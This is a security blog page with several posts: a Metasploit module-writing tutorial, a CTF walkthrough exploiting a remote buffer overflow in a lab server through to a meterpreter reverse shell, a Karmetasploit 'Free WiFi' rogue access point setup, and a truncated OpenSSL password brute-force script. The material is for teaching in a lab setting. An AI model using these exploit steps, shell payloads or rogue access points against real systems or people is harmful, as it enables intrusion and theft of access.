Bill’s Security Blog

My friend Daniel “Mooky” Robertson provided this brief tutorial on Metasploit module creation. Rather than incorporating it into the remote buffer overflow tutorial, his work deserves its own, stand-alone post. This post references some of the research provided in the remote buffer overflow tutorial, so you may want to read both to get the full picture. Mooky solved he CTF about which the remote buffer overflow tutorial was written, and I thank him for his help and support!

Metasploit Module Creation

Author: Daniel “Mooky” Robertson

Revisions: 20110521 - to clarify language.

Metasploit module creation is as simple, or as complicated as you want to make it. Some modules require exploit code longer than the entirety of this blog post. Some others, on the other hand, are as little as 5 lines. In this module, I’m going to make a few assumptions. First being that you know the basics of the ruby scripting language. If you don’t, please Google some tutorials. There is a plethora of material, and I learned most of what I know about ruby from doing this myself. Second, I’m going to assume you are using the template provided here.

We’re only going to hit the important parts of the code, and discuss those. The rest of the code is commented, and should be easy to adjust.

First we take our information we have gathered thus far:
Filler: 260 bytes
Location of JMP ESP: 0×77C6AFEE
Max Payload: 1784
Server port: 1337

The first area of importance we want to edit is the Payload area. Payload is the amount of contiguous space we have to insert our payload. Now I’m not going to go too deep into the different types of payload options that Metasploit has. Suffice to say, there are ways to work with less space more efficiently. But in this case, back to our math. We shove 260 bytes of data in the front, then 4 for the memory address that we will place in EIP, and afterward we have 1784 bytes of data. So we have 2 options, 260, or 1784. Well, it is possible to stick a bind-back shell into 260 bytes of space. But the object of this CTF challenge was to stick a meterpreter, and that requires a bit more. So since the space is divided by the 4 bytes for EIP, and the space must be contiguous we discount the first 260 bytes entirely. Our payload space therefore equals 1784. Metasploit uses this data to determine what possible payloads can fit in an exploit module. If a payload size exceeds the space allotted within the module, then it will not be shown.

Note: If you want to test this, try this out. Make the size 260, then enter Metasploit, load the module, and type “show payloads.” Exit Metasploit, then change the number to 1784, and see how many more payload options show up. Meterpreter is all of the sudden, an option, among other things.

The other aspect within Payload we need to consider is BadChars. BadChars are characters that the encoder will avoid in the process of packaging the payload. I’m not going to go into detail about how to figure out which characters are bad. Other people out on the web will do a far better job than I could. But for the sake of this, understand that we are using a TCP connection, basically sending a char array across the wire. A null byte, or “\x00” is a termination character. Therefore we do not want to have our payload include this char in the encoding process.

Next to edit is the Targets section. The format is: “[ 'Dispayed name of the system/version', {'Ret' =>0xReturnMemoryAddress } ]”. The first area in apostrophes is merely a human readable name so when you type “show targets,” you can choose the appropriate system platform of your intended victim. The Ret value is the memory address which we want to stick into EIP. Remember: EIP is the address of the next instruction to be executed, not the actual instruction itself. In our case, the return value we found was 0×77c6afee. In my experience the Ret value has not been case sensitive.

Now we get to skip on to the good stuff. “def exploit”… Doesn’t that just sound nice? Anyway, before I digress too much… the coding….

First things first. “connect” to the target.

Next we build the string that we’ll send to the remote application. We basically already know what the string is we have to build. It would look something like this:
“{260 bytes of filler}{packed return address to stick in EIP}{the shellcode/payload of our choosing}”

Using the variable name buffer, we initially set its value to be 260 “A”’s. The “<<” statements after this basically mean “tack whatever is to the right of this onto the end of the variable to the left.” Next we have to stick in our return address for EIP. But take note we cannot just write it as is!! It HAS to be packed. This is what the .pack(’V') function does for us.  Using the [target.ret].pack(’V'), you have the option of simply adding more targets to the appropriate section, and having a single module work for multiple platforms/OS versions. If you pack the return address yourself, then unless you error check what the value of “target” was, you will essentially lock the module to only be applicable to a single OS version.

The “make_nops()” function returns what is called a NOP Sled. NOP stands for NO Operation. In assembly, there are certain function calls that essentially do not do anything. The most famous one is \x90. This basically tells it to call a sleep function for a clock cycle. Certain IDS’ have come to sniff network traffic for the existence of NOPs, and will subsequently catch and prevent the traffic from getting to your intended victim. Therefore other ways of making NOPs have been discovered. These include, but are not limited to doing such things as sending the bytes for the code “xor eax,eax”, or other legitimate instruction that will eat a few clock cycles, but still have the same result: which is will not mess with the execution of our payload. In our case, since we know an exact location for where the call to JMP ESP is located, we don’t need a NOP sled, so I could remove it.

Finally the good stuff… we insert our payload. But we have to tack on the “.encode” function.

So at this point our exploit string, buffer, is completely ready to go. We print a status message(please use these when debugging your code. They make like so much easier.) and we write it to the sock with the sock.put() method. The handler starts whatever process are required to handle any interaction that the attacker and victim will have. In our case it starts the module that will interact with the meterpreter payload we sent to our victim. In other cases it will open a port on your local machine to listen for a reverse_tcp connection, or it will connect to a port that we set up a listening station on in the victim machine. Lastly we disconnect.

Launch of msfconsole, load the module, set your options and exploit!
If all went well, it’s “game over man! GAME OVER!!!!”

[Posted on behalf of Mooky]

Authors
Hakuza and Mooky

Purpose
This tutorial provides a step-by-step walk-through of the identification of a remotely accessible buffer overflow, information gathering, and the development of a Metasploit module to exploit the vulnerability.

Intended Audience
Minimal skills are necessary to follow this tutorial. This tutorial will be helpful to folks with no prior knowledge of the identification and development of an exploit for a remotely exploitable buffer overflow. Individuals familiar with developing buffer overflow attacks may not benefit from this tutorial.

Background
The NoVA Hackers community developed a capture the flag event the goal of which is to identify a bug in a Windows-based service, develop an exploit, and implement a Metasploit module that will deliver a payload by exploiting the vulnerable application. The service being exploited is a custom application developed specifically for the CTF.

Preparations
In order to follow along with this tutorial, a few tools will be necessary. Below is a description of the lab environment that was used to create this tutorial, however, any configuration that provides the identified tools should be acceptable.

Methodology
This tutorial provides step-by-step instructions for all stages of the development of the exploit.

At each step, the activities performed, the results, and the relevant information (documented as FACTS) are recorded to aide the reader in the understanding of the information gathering activities.

A series of screenshots are provided as well. Click on the screen shot to view full size images.

Lab Environment
Two virtual machines running under VirtualBox were used to develop this tutorial.
I have another blog post detailing how to set up a virtual lab of this variety.

Windows Server 2003
This host will run the vulnerable service and will run a debugger.
Software:

• server.exe (download)
• Immunity Debugger

Configuration:

• Disable Data Execution Prevention (DEP)

BackTrack 4 (download)
Any computer running the software below would be acceptable, but this tutorial was created using a virtual machine running BackTrack 4.
Software:

• perl
• telnet
• netcat
• Metasploit

The Windows Server 2003 host will be referred to as WS2003, and the BackTrack 4 host will be referred to as BT4 for the remainder of the tutorial.

Information Gathering
The first step is to gather some information about the target server, and the targeted service (server.exe).

Determine IP of Target Host

On WS2003 box:

C:\>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.1.0.1
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . :

FACT: Target server binds to 10.1.0.1

Determine Service Options and Flags [002]

Start server.exe using the command line with various switches.
Try:

C:\> server.exe /h

Nothing

C:\> server.exe /help

Nothing

C:\> server.exe /?

Nothing

C:\> server.exe /debug

Nothing
The service does not expose any meaningful information…

Determine if Service Binds to a Socket
Check netstat before starting server.exe:

C:\>netstat /a
Active Connections
Proto Local Address Foreign Address State
TCP ws2003:http ws2003:0 LISTENING
TCP ws2003:epmap ws2003:0 LISTENING
TCP ws2003:microsoft-ds ws2003:0 LISTENING
TCP ws2003:1025 ws2003:0 LISTENING
TCP ws2003:1026 ws2003:0 LISTENING
TCP ws2003:netbios-ssn ws2003:0 LISTENING
UDP ws2003:microsoft-ds *:*
... ....

Now, start the server and try again…

C:\>netstat /a
Active Connections
Proto Local Address Foreign Address State
TCP ws2003:http ws2003:0 LISTENING
TCP ws2003:epmap ws2003:0 LISTENING
TCP ws2003:microsoft-ds ws2003:0 LISTENING
TCP ws2003:1025 ws2003:0 LISTENING
TCP ws2003:1026 ws2003:0 LISTENING
TCP ws2003:1337 ws2003:0 LISTENING
TCP ws2003:netbios-ssn ws2003:0 LISTENING
UDP ws2003:microsoft-ds *:*
... ....

FACT: Service binds to TCP port 1337

Probe the Service Using Nmap

On BT4 box:

root@bt:~# nmap -p1-65535 10.1.0.1
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-01-14 01:03 EST
Nmap scan report for 10.1.0.1
Host is up (0.00034s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1337/tcp open waste
MAC Address: 08:00:27:AC:E3:71 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 36.68 seconds

FACT: Service exposes service name: waste

Probe Service Using Netcat

Start server.exe on the WS2003 host, then netcat from the BT4 host to the service on the target server and type a few things…

On WS2003 box:

C:\ctf>server.exe

On BT4 box:

root@bt:~# nc 10.1.0.1 1337
hello
hello
ECHO Echo echo
ECHO Echo echo
^C
root@bt:~#

On WS2003 box, notice the output:

Bytes received: 6
Bytes sent: 6
Bytes received: 15
Bytes sent: 15
Connection closing...

FACTS:
server.exe prints the number of bytes received
server.exe echo’s the received bytes back to the client
server.exe prints the number of bytes sent to the client

This means that server.exe is most likely copying data off the wire into some kind of string buffer.

Determine if Vulnerable to Buffer Overflow

Attempt to send a large amount of data to the service.

The command below generates a string of 5000 A’s and sends them to the target service using Netcat.

On BT4 box:

root@bt:~# perl -e "print 'a' x 5000;" | nc 10.1.0.1 1337
root@bt:~#

On WS2003 box:

C:\ctf>server.exe
Bytes received: 2048
C:\ctf>

Hmm… That’s interesting - I sent 5000 a’s but server reports 2048 received, then it closed the connection…

View Error Logs for Additional Information

The full Error Log entries (from the Windows Event Manager) are copied below (at the end of the tutorial). Looks like an overflow.

From the error logs, additional facts can be obtained…

FACTS:
Failure code c0000005 = Access Violation
Fault address 0×61616161
0×61616161 - 61 is hex for ‘a’ - so we overwrote the EIP!
Server.exe vulnerable to, at least, remote Denial of Service (DOS)
Server.exe may be vulnerable to remote code execution via buffer overflow

Verify Vulnerability to Buffer Overflow

On WS2003 box:
Start Immunity Debugger
Open server.exe
Hit F9
NOTE: In order for this to work, I needed to hit Shift+F9 after starting the run in the debugger. This was the case for every execution of server.exe when using the debugger.

On BT4 box:

root@bt:~# perl -e "print 'a' x 5000;" | nc 10.1.0.2 1337

In Immunity Debugger, notice that:
Both EAX and ESP have values represented as ASCII strings of a’s
EIP has value: 0×61616161

FACT: server.exe is vulnerable to remote buffer overflow, and likely remote code execution

Determine Location of Overflow
At some point, the input filled the memory pointed to by EAX, and EIP, and possibly all of ESP.

The goal of this step is to determine precisely where in the input the value of EIP is overwritten.

If we can determine where EIP is overwritten, and can write custom shellcode into ESP (which should be trivial, since we have already overwritten ESP), then we are golden.

Our goal will be to store shellcode in the buffer pointed to by ESP, and then overwrite EIP with a command to execute the code in ESP (using the call “JMP ESP”).

Metasploit provides the tools pattern_create and pattern_offset that can be used to find the location, in the input stream, where EIP is overwritten.

The tool pattern_create creates a random-valued string of user-defined length. The tool pattern_offset will find the offset of a substring within in a string created using pattern_create.

The EIP register will be overwritten with 4 bytes from our string. We can feed those 4 bytes to pattern_offset to show exactly how many bytes of input are needed prior to EIP being overwritten.

Knowing exactly where EIP is overwritten is crucial to the creation of our exploit.

On WS2003 box:
Start Immunity Debugger
Open server.exe
Hit F9
NOTE: Again, in order for this to work, I needed to hit Shift+F9 after starting the run.

On BT4 box:

root@bt:~# /opt/metasploit3/msf3/tools/pattern_create.rb 5000 > overflow.txt
root@bt:~# cat overflow.txt | nc 10.1.0.1 1337

On the WS2003 box, in Immunity Debugger (ID), notice that EIP has value: 0×37694136

This value is Hex representation of the substring from the input written into EIP when the EAX buffer overflowed.

Stop the program in ID.

On BT4 box:

root@bt:~# /opt/metasploit3/msf3/tools/pattern_offset.rb 37694136 5000
260

So, at location 260 in the input, the EAX buffer is full, and the next four bytes are written into the EIP register.

FACT: EIP overwrites after 260 input bytes

Test the EIP Overwrite Location
The goal of this step is to verify the location discovered above. We will do this by creating a string of 260 x’s, followed by four a’s, followed by 500 y’s. Our hope is to see the value 0×61616161 in the EIP register.

On WS2003 box:
Start Immunity Debugger
Open server.exe
Hit F9
Hit Shift+F9 after starting the run

On BT4 box:

root@bt:~# perl -e "print 'x' x 260 . 'aaaa' . 'y' x 500" > overflow2.txt
root@bt:~# cat overflow2.txt | nc 10.1.0.1 1337

Notice that EIP has value: 0×61616161

Also, note that EAX points to a string filled with x’s and ESP points to a string of y’s, exactly as we want.

Sweet. We have confirmed that EIP is overwritten after 260 bytes of input, and that we can overwrite both EAX and ESP buffers.

Find Call to JMP ESP
The EIP register holds the location, in memory, of the next instruction to execute.

We have shown that we can overwrite ESP.

We have also shown we can overwrite EIP with any value we want, so we will store some shellcode at the location pointed to by ESP, then fill EIP with the location of a command that simply says “go execute the code in the ESP.”

When the CPU asks IEP the next command to execute, EIP will answer, “it’s at ESP!”

In order to exploit this vulnerability, we will need to write our shellcode into ESP, then fill EIP with a command to jump to the ESP.

We need to find a memory location in server.exe (or one of its loaded modules) that has the command for “JMP ESP.”

To do so, load server.exe into Immunity Debugger.
Click Alt+E
For each dll, double click that line in the “Executible modules” window.
Click Ctrl+F
Type: JMP ESP
If you get a hit, note the address location.

In our case, a call to JMP ESP was found in RPCRT4.dll at location: 0×77C6AFEE

77C6AFEE FFE4 JMP ESP

FACT: Call to JMP ESP is at location: 0×77C6AFEE

Determine Space Available for Shellcode
Our next goal is to determine how much room we have to store shellcode. We hope it is enough to store a common payload.

I’m sure there’s a better way to do this, but…

We’ll re-use our earlier process described in “Determine Location of Overflow” to attempt to determine how much data we can store in ESP.

On WS2003 box:
Set up server.exe in the debugger as described earlier.

On BT4 box:

root@bt:~# cat overflow.txt | nc 10.1.0.1 1337

When the application crashed, the registers had the following values:

EAX 0013ECA0 ASCII "Aa0Aa1Aa2Aa3Aa4Aa5Aa..."
ECX 0013FDE0
EDX 00000800
EBX 7FFD6000
ESP 0013EDA8 ASCII "Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj..."
EBP 69413569
ESI 00000000
EDI 00000000
EIP 37694136

From the CPU window, we can gather address ranges of interest. Offsets gathered by double clicking on the address storing the value of EIP, in our case 0×0013EDA4…

Offset Address Hex Val ASCII
$-104 0013ECA0 41306141 Aa0A <- beginning of EAX
$-100 0013ECA4 61413161 a1Aa
... ...
$-8 0013ED9C 41346941 Ai4A
$-4 0013EDA0 69413569 i5Ai <- end of EAX
$ ==> 0013EDA4 37694136 6Ai7 <- value stored in EIP
$+4 0013EDA8 41386941 Ai8A <- beginning of ESP
$+8 0013EDAC 6A413969 i9Aj
... ...
$+6F4 0013F498 43307143 Cq0C
$+6F8 0013F49C 71433171 q1Cq <- end of ESP
$+6FC 0013F4A0 FBFAF9F8 øùúû

Note that our offset for the beginning of EAX is 0×104 (base 16) which is 260 base 10, matching what we discovered earlier.

The buffer to which ESP points has length 0×6F8 (base 16) giving us 1784 bytes to store our shellcode.

We can confirm this number using the same method we used to find the offset for EIP earlier:

Take the Hex value at the end of the ESP buffer and find the offset:

root@bt:~# /opt/metasploit3/msf3/tools/pattern_offset.rb 71433171 5000
2044

Calcualate the total space by subtracting the offset of EIP
2044 - 260 = 1784

Sweet.

Also, remember back in the step “Determine if Vulnerable to Buffer Overflow,” when server.exe crashed, it reported, “Bytes received: 2048?”

Well, 260 bytes (EAX) + 4 bytes (EIP) + 1784 bytes (ESP) = 2048. It’s nice that computers are precise :)

FACT: ESP will hold 1784 bytes.

Build Metasploit Exploit Module
Neither author of this tutorial are Metasploit experts. However, developing an exploit module for this overflow will be pretty simple.  Mooky provided an excellent write-up on Metasploit module creation.  Please read Mooky’s tutorial for details on how this module was developed.

We will find an existing Metasploit module that exploits a simple buffer overflow, then modify it to meet our needs.

The freeftpd_user.rb module is a perfect candidate. The file is in:
/opt/metasploit3/msf3/modules/exploits/windows/ftp

Lets make a new directory for our new module, and get a copy of freeftpd_user.rb, and begin editing…  Mooky’s tutorial includes a module template that would work as well.  It is commented for easy understanding.

On BT4 box:

root@bt:~# mkdir /opt/metasploit3/msf3/modules/exploits/ctf
root@bt:~# cd /opt/metasploit3/msf3/modules/exploits/ctf/
root@bt:/opt/metasploit3/msf3/modules/exploits/ctf# cp ../windows/telnet/goodtech_telnet.rb .
root@bt:/opt/metasploit3/msf3/modules/exploits/ctf# ls
goodtech_telnet.rb
root@bt:/opt/metasploit3/msf3/modules/exploits/ctf# mv goodtech_telnet.rb ctf.rb
root@bt:/opt/metasploit3/msf3/modules/exploits/ctf# vi ctf.rb

For ease of use, download the edited Metasploit module.

The facts, discovered above, that we need to develop the exploit:
Filler: 260 bytes
Location of JMP ESP: 0×77C6AFEE
Max Payload: 1784
Server port: 1337

Once done editing the file, save it and test the exploit.

Test Metasploit Exploit Module
Our Metasploit module is created, all we have to do now is to test.

Fortunately, the Metasploit platform makes it very simple to add a payload and exploit the vulnerability. We will use the windows reverse TCP handler as the payload.

On WS2003 box:
Start Immunity Debugger
Open server.exe
Hit F9
Hit Shift+F9 after starting the run

Alternatively, you can simply start server.exe from the command line - outside the debugger. You don’t really need the debugger at this point…

On BT4 box:

root@bt:/opt/metasploit3/msf3/msfconsole
msf > use exploit/ctf/ctf
msf exploit(ctf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ctf) > set LHOST 10.1.0.2
LHOST => 10.1.0.2
msf exploit(ctf) > set RHOST 10.1.0.1
RHOST => 10.1.0.1
msf exploit(ctf) > exploit
[*] Started reverse handler on 10.1.0.2:4444
[*] Trying target Windows Server 2003 English...
[*] Sending stage (749056 bytes) to 10.1.0.1
[*] Meterpreter session 1 opened (10.1.0.2:4444 -> 10.1.0.1:1033)...

We can verify we have shell access by comparing a process list generated through meterpreter, and generated through the Windows Server command line.

In our example, notice that the ‘ps’ command run through meterpreter generates the same process list as the Windows Server. Get out the R00t Dance!

On BT4 box:

meterpreter > ps
...
1656 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
400 cmd.exe x86 0 WS2003\Administrator C:\WINDOWS\system32\cmd.exe
996 server.exe x86 0 WS2003\Administrator C:\ctf\server.exe
584 cmd.exe x86 0 WS2003\Administrator C:\WINDOWS\system32\cmd.exe
1960 wmiprvse.exe x86 0 C:\WINDOWS\system32\wbem\wmiprvse.exe

On WS2003 box:

C:\> tasklist
...
wmiprvse.exe 1656 Console 0 4,808 K
cmd.exe 400 Console 0 1,508 K
server.exe 996 Console 0 1,696 K
cmd.exe 584 Console 0 1,408 K
tasklist.exe 1648 Console 0 3,492 K
wmiprvse.exe 1960 Console 0 4,892 K

Note: when you run the exploit, you may get the following output:

[*] Started reverse handler on 10.1.0.2:4444
[*] Trying target Windows Server 2003 English...
[*] Exploit completed, but no session was created.

This failure to adequately exploit the vulnerability is the result of ASLR, I believe. Please read on.

In order to successfully run this exploit, you may need to re-start server.exe and try again, possibly several times.

Impact of ASLR and DEP
For the exploit to work, I had to disable DEP on the WS2003 box.

ASLR
With DEP disabled, the exploit still fails roughly 50% of the time - I suspect due to ASLR.
Here are the run results from 20 attempted runs of the exploit module, 1=success, 0=fail: 11100000010101111110
Watching the debugger during test runs, it is clear that the location storing EIP changes for instances where the exploit fails.

DEP
Once I got the exploit working, even with a 50% fail rate under ASLR, I re-enabled DEP to test further.

Results
The exploit fails 100% of the time with DEP enabled, even when it would have worked.

We can confirm that the exploit would have worked by observing the value of EIP when the exploit module is executed.

0013EDA4 77C6AFEE .... RPCRT4.77C6AFEE

So, I suspect that the 50% failure rate is the result of ASLR.

Output of Error Logs
Back in the step, “Determine if Vulnerable to Buffer Overflow,” I mentioned that full error log entries were included… Here they are, partially truncated for brevity. I left some useful instructional tidbits in the Dr. Watson error log message.

The DR. Watson log entry only appears to be created when I crashed server.exe with DEP enabled. I didn’t test this hypothesis, however. In any case, I included the entry, for completeness.

From the error log:

Event Type:	Error
Event Source:	Application Error
Event Category:	(100)
Event ID:	1000
Date:		2/9/2011
Time:		11:01:54 PM
User:		N/A
Computer:	WS2003
Description:
Faulting application server.exe, version 0.0.0.0, faulting module unknown,
version 0.0.0.0, fault address 0x61616161.

For more information, see Help and Support Center at
http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 41 70 70 6c 69 63 61 74   Applicat
0008: 69 6f 6e 20 46 61 69 6c   ion Fail
0010: 75 72 65 20 20 73 65 72   ure  ser
0018: 76 65 72 2e 65 78 65 20   ver.exe
0020: 30 2e 30 2e 30 2e 30 20   0.0.0.0
0028: 69 6e 20 75 6e 6b 6e 6f   in unkno
0030: 77 6e 20 30 2e 30 2e 30   wn 0.0.0
0038: 2e 30 20 61 74 20 6f 66   .0 at of
0040: 66 73 65 74 20 36 31 36   fset 616
0048: 31 36 31 36 31            16161

Dr. Watson error…

Event Type:	Information
Event Source:	DrWatson
Event Category:	None
Event ID:	4097
Date:		2/9/2011
Time:		11:01:54 PM
User:		N/A
Computer:	WS2003
Description:
The application, C:\ctf\server.exe, generated an application error
The error occurred on 02/09/2011 @ 23:01:54.869 The exception
generated was c0000005 at address 61616161 ()

For more information, see Help and Support Center at
http://go.microsoft.com/fwlink/events.asp.
Data:
0000: 0d 00 0a 00 0d 00 0a 00   ........
0008: 41 00 70 00 70 00 6c 00   A.p.p.l.
0010: 69 00 63 00 61 00 74 00   i.c.a.t.
0018: 69 00 6f 00 6e 00 20 00   i.o.n. .
0020: 65 00 78 00 63 00 65 00   e.x.c.e.
0028: 70 00 74 00 69 00 6f 00   p.t.i.o.
0030: 6e 00 20 00 6f 00 63 00   n. .o.c.
0038: 63 00 75 00 72 00 72 00   c.u.r.r.
0040: 65 00 64 00 3a 00 0d 00   e.d.:...
0048: 0a 00 20 00 20 00 20 00   .. . . .
0050: 20 00 20 00 20 00 20 00    . . . .
0058: 20 00 41 00 70 00 70 00    .A.p.p.
0060: 3a 00 20 00 43 00 3a 00   :. .C.:.
0068: 5c 00 63 00 74 00 66 00   \.c.t.f.
0070: 5c 00 73 00 65 00 72 00   \.s.e.r.
0078: 76 00 65 00 72 00 2e 00   v.e.r...
0080: 65 00 78 00 65 00 20 00   e.x.e. .
0088: 28 00 70 00 69 00 64 00   (.p.i.d.
0090: 3d 00 32 00 31 00 36 00   =.2.1.6.
0098: 29 00 0d 00 0a 00 20 00   )..... .
00a0: 20 00 20 00 20 00 20 00    . . . .
00a8: 20 00 20 00 20 00 57 00    . . .W.
00b0: 68 00 65 00 6e 00 3a 00   h.e.n.:.
00b8: 20 00 32 00 2f 00 39 00    .2./.9.
00c0: 2f 00 32 00 30 00 31 00   /.2.0.1.
00c8: 31 00 20 00 40 00 20 00   1. .@. .
00d0: 32 00 33 00 3a 00 30 00   2.3.:.0.
00d8: 31 00 3a 00 35 00 34 00   1.:.5.4.
00e0: 2e 00 38 00 36 00 39 00   ..8.6.9.
00e8: 0d 00 0a 00 20 00 20 00   .... . .
00f0: 20 00 20 00 20 00 20 00    . . . .
00f8: 20 00 20 00 45 00 78 00    . .E.x.
0100: 63 00 65 00 70 00 74 00   c.e.p.t.
0108: 69 00 6f 00 6e 00 20 00   i.o.n. .
0110: 6e 00 75 00 6d 00 62 00   n.u.m.b.
0118: 65 00 72 00 3a 00 20 00   e.r.:. .
0120: 63 00 30 00 30 00 30 00   c.0.0.0.
0128: 30 00 30 00 30 00 35 00   0.0.0.5.
0130: 20 00 28 00 61 00 63 00    .(.a.c.
0138: 63 00 65 00 73 00 73 00   c.e.s.s.
0140: 20 00 76 00 69 00 6f 00    .v.i.o.
0148: 6c 00 61 00 74 00 69 00   l.a.t.i.
0150: 6f 00 6e 00 29 00 0d 00   o.n.)...
....
1178: 0d 00 0a 00 65 00 69 00   ....e.i.
1180: 70 00 3d 00 36 00 31 00   p.=.6.1.
1188: 36 00 31 00 36 00 31 00   6.1.6.1.
1190: 36 00 31 00 20 00 65 00   6.1. .e.
1198: 73 00 70 00 3d 00 30 00   s.p.=.0.
11a0: 30 00 31 00 32 00 65 00   0.1.2.e.
11a8: 64 00 61 00 38 00 20 00   d.a.8. .
11b0: 65 00 62 00 70 00 3d 00   e.b.p.=.
11b8: 36 00 31 00 36 00 31 00   6.1.6.1.
11c0: 36 00 31 00 36 00 31 00   6.1.6.1.
....
1a00: 20 00 0d 00 0a 00 57 00    .....W.
1a08: 41 00 52 00 4e 00 49 00   A.R.N.I.
1a10: 4e 00 47 00 3a 00 20 00   N.G.:. .
1a18: 46 00 72 00 61 00 6d 00   F.r.a.m.
1a20: 65 00 20 00 49 00 50 00   e. .I.P.
1a28: 20 00 6e 00 6f 00 74 00    .n.o.t.
1a30: 20 00 69 00 6e 00 20 00    .i.n. .
1a38: 61 00 6e 00 79 00 20 00   a.n.y. .
1a40: 6b 00 6e 00 6f 00 77 00   k.n.o.w.
1a48: 6e 00 20 00 6d 00 6f 00   n. .m.o.
1a50: 64 00 75 00 6c 00 65 00   d.u.l.e.
....

Purpose
The purpose of this post is to provide quick guidance on getting Karmetasploit running on BT4R2 for my specific environment.  These steps may work for you, but this post is intended, primarily, to document this so I can remember it later…

Background
Karmetasploit is a combination of Karma and Metaploit.

Resources Used
1: KARMA + Metasploit Framework 3 == Karmetasploit
2: Metasploit with MYSQL in BackTrack 4 r2
3: Karmetasploit Configuration
4a: Metasploit + Karma=Karmetasploit Part 1
4b: Metasploit + Karma=Karmetasploit Part 2

Prerequisites

• BT4R2 is installed
• Networking to the Internet is available (to update BT and MSF)

Update BackTrack and MSF
Update BT4R2

> /usr/bin/apt-get update
> /usr/bin/apt-get upgrade

Update MSF

> /opt/metasploit3/msf3/msfupdate

Configure
Metasploit Karma Configuration File
Download File

> /usr/bin/lynx -nolist -dump http://metasploit.com/users/hdm/tools/karma.rc > karma.rc

Edit File
Change the following lines as noted
load db_sqllite3 –> db_driver mysql
db_create /root/karma.db –> db_connect root:toor@localhost/karma

DHCP Configuration File
Edit File
Change the following config file as described in Resource 1.
/etc/dhcp3/dhcpd.conf

Reboot
Restart the host to reset the wireless network… This step may be necessary if you were using the wireless interface to perform the above activities.

Test Wireless Injection

> /usr/local/sbin/airmon-ng start wlan0

The above command creates interface mon0.
The next command tests packet injection on the interface. (Note, this is “DASH DASH test mon0″ - it may display as “DASH test mon0″ in your browser).

> /usr/local/sbin/aireplay-ng –test mon0

To stop the monitor interface

> /usr/local/sbin/airmon-ng stop mon0

Run
Start MySQL

> /etc/init.d/mysql start

Create Fake AP
If have not done so, place the wireless card in monitor mode using:

> /usr/local/sbin/airmon-ng start wlan0

Then execute the following commands:

> /usr/local/sbin/airbase-ng -P -C 30 -c 1 -e “Free WiFi” -v mon0

(The above command creates interface at0. We will use this as the end-point interface for clients connecting to our fake AP.)
Note: without the -c 1 option, my AP would NOT show up in the available networks list of my victim. I obtained the channel number by looking at the output of the –test. I compared the APs showing up in that list to those showing up on my victim, then using the same channel. Others have experienced this as noted in Kosis’s comment on CG’s blog post (Resource 4b).

> /sbin/ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
> /usr/sbin/dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
> /opt/metaploit3/msf3/msfconsole -r karma.rc
> /usr/sbin/tcpdump -w dump.pcap -i at0

Look at Progress

msf> db_notes

Consider: Blackhole Routing from the MSF paper

NOTES
Looks like fakedns crashes after some time. Appears to crash after first client connections. How to monitor?
The fakedns can be restarted as follows:

msf> use auxiliary/server/fakedns
msf> set SRVPORT 53
msf> run

I want to get started with BackTrack 4 R2 (BT4R2) on a dedicated laptop. But I don’t think I can burn a DVD reliably, so I need another method.

Solution - Bootable USB Thumb Drive

This solution may work with other operating systems…

Steps:

1. Download BT4R2 ISO image.
2. Download UNetbootin and install.
3. Use UNetbootin to create the bootable ISO. This may take a while.
4. Prep target laptop by ensuring that the “boot from USB” option is enabled.  On my test box, a D620, it’s F2 at boot to get into the BIOS configuration.  NOTE: Be sure to clean up the boot settings once the OS is installed on the HDD.
5. Once UNetbootin is done creating the bootable USB drive, insert the key into the target laptop and boot!
6. Follow process to install BT4R2.

Saweet.

Bill

Background

I’m playing with one of the De-ICE pen-testing CD’s, and I came across a file that was encrypted.

The problem is, I don’t know:

• The cipher used to encrypt the file
• The password used
• Whether or not the file was Base64 encoded

Discovery

By poking around the box, I was able to determine that OpenSSL was installed.  OpenSSL will reveal the encryption commands it supports by typing:

# openssl -help

So I know the set of algorithms that could have been used to encrypt the file.

I also have a candidate set of passwords that I believe were used to encrypt the file.  These were uncovered during the pen test.

I need to figure out if the file was Base64 encoded and the cipher used.

# file encrypted_file.enc
encrypted_file.enc: data

The file is not Base64 encoded or it would be type text.  I tested this by encrypting two files, one with Base64 and one without.  The Base64 file returned type text, the other type data.

To test for the algorithm used, I tried encrypting a file and decrypting with both correct and incorrect passwords.  Only clean decryptions (where the correct password was used) result in plain text (”ASCII text”) when using the “file” command.  Decrypting a file with the wrong password results in a file with file type “data,” or something else.

This will make scripting of a solution easy.

The challenge for me is that I don’t know much about shell scripting.  Fortunately, there is a sweet resource over at the LDP - the Advanced Bash-Scripting Guide by Mendel Cooper.  It was a huge help.

What I know now:

• Candidate passwords
• Candidate encryption algorithms
• The file was not Base64 encoded

What I don’t know:

• The combination of password/algorithm used to encrypt the file.

What I want:

• The decrypted file
• The password and algorithm used to encrypt the file

Scripting a Solution

Result: decrypt.sh
Given a set of candidate encryption algorithms and candidate passwords, the script will:

• Try all combinations of password/algorithm
• Save the decrypted results in the specified directory
• Save decrypted files wiith a file name of the type <password>_<algorithm>.txt
• Run the “file” command at the end, looking for any that have type ASCII text

If the algorithm is successful, at least one file with type ASCII text will have be a valid decryption of the original file.

The file worked like a charm to decrypt the file I found.

The Code

#! /bin/bash

SUPPORTED_ALGS=(aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb aes-256-cbc
aes-256-ecb base64 bf bf-cbc bf-cfb
bf-ecb bf-ofb cast cast-cbc cast5-cbc
cast5-cfb cast5-ecb cast5-ofb des des-cbc
des-cfb des-ecb des-ede des-ede-cbc des-ede-cfb
des-ede-ofb des-ede3 des-ede3-cbc des-ede3-cfb des-ede3-ofb
des-ofb des3 desx rc2 rc2-40-cbc
rc2-64-cbc rc2-cbc rc2-cfb rc2-ecb rc2-ofb
rc4 rc4-40)
